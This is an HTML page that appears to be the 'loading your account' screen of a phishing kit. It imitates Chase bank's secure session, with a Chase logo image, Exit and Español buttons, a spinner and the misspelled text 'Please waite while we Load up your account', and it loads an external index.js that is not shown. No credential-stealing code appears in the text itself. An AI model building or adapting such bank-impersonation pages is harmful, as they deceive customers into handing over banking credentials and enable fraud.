<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>In Progress</title>
    <script src="https://kit.fontawesome.com/73be9fb684.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="style.css">
    <link rel="icon" href="images/1000193120-removebg-preview.png" type="image.png">
</head>
<body class="securebody" id="loading-page">
    <!-- heder start -->
     <div class="headercon">
        <div class="exitbuttoncon">
            <span class="exitinline">
                <i class="fa-solid fa-chevron-left whitechevon"></i>
                <button class="exitbutton">Exit</button>
            </span>
        </div>
        <div class="hederimageholder">
            <img src="images/white_chase_logo_innercircl-removebg-preview.png" alt="">
        </div>
        <div class="languagehlder">
            <button class="expaniol">Español</button>
        </div>
    </div>
    <!-- heeder end -->
    <div class="skelentonloadingcon">

        <div class="loadingio-spinner-spinner-nq4q5u6dq7r">
            <div class="ldio-x2uulkbinbj">
                <div></div>
                <div></div>
                <div></div>
                <div></div>
                <div></div>
                <div></div>
                <div></div>
                <div></div>
                <div></div>
                <div></div>
                <div></div>
                <div></div>
            </div>
        </div>
        <p class="loadingpage">Please waite while we Load up your account .</p>
    </div>
    
    <style type="text/css">
@keyframes ldio-x2uulkbinbj {
  0% { opacity: 1 }
  100% { opacity: 0 }
}
.skelentonloadingcon{
    height: 85vh;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
}
.ldio-x2uulkbinbj div {
  left: 47px;
  top: 24px;
  position: absolute;
  animation: ldio-x2uulkbinbj linear 1s infinite;
  background: #5b97e1;
  width: 6px;
  height: 12px;
  border-radius: 3px / 6px;
  transform-origin: 3px 26px;
}.ldio-x2uulkbinbj div:nth-child(1) {
  transform: rotate(0deg);
  animation-delay: -0.9166666666666666s;
  background: #5b97e1;
}.ldio-x2uulkbinbj div:nth-child(2) {
  transform: rotate(30deg);
  animation-delay: -0.8333333333333334s;
  background: #5b97e1;
}.ldio-x2uulkbinbj div:nth-child(3) {
  transform: rotate(60deg);
  animation-delay: -0.75s;
  background: #5b97e1;
}.ldio-x2uulkbinbj div:nth-child(4) {
  transform: rotate(90deg);
  animation-delay: -0.6666666666666666s;
  background: #5b97e1;
}.ldio-x2uulkbinbj div:nth-child(5) {
  transform: rotate(120deg);
  animation-delay: -0.5833333333333334s;
  background: #5b97e1;
}.ldio-x2uulkbinbj div:nth-child(6) {
  transform: rotate(150deg);
  animation-delay: -0.5s;
  background: #5b97e1;
}.ldio-x2uulkbinbj div:nth-child(7) {
  transform: rotate(180deg);
  animation-delay: -0.4166666666666667s;
  background: #5b97e1;
}.ldio-x2uulkbinbj div:nth-child(8) {
  transform: rotate(210deg);
  animation-delay: -0.3333333333333333s;
  background: #5b97e1;
}.ldio-x2uulkbinbj div:nth-child(9) {
  transform: rotate(240deg);
  animation-delay: -0.25s;
  background: #5b97e1;
}.ldio-x2uulkbinbj div:nth-child(10) {
  transform: rotate(270deg);
  animation-delay: -0.16666666666666666s;
  background: #5b97e1;
}.ldio-x2uulkbinbj div:nth-child(11) {
  transform: rotate(300deg);
  animation-delay: -0.08333333333333333s;
  background: #5b97e1;
}.ldio-x2uulkbinbj div:nth-child(12) {
  transform: rotate(330deg);
  animation-delay: 0s;
  background: #5b97e1;
}
.loadingio-spinner-spinner-nq4q5u6dq7r {
  width: 100px;
  height: 100px;
  display: inline-block;
  overflow: hidden;
  background: transparent;
}
.ldio-x2uulkbinbj {
  width: 100%;
  height: 100%;
  position: relative;
  transform: translateZ(0) scale(1);
  backface-visibility: hidden;
  transform-origin: 0 0; /* see note above */
}
.ldio-x2uulkbinbj div { box-sizing: content-box; }
/* [ldio] generated by https://loading.io */
</style>

  <script src="index.js" type="module"></script>
</body>
</html>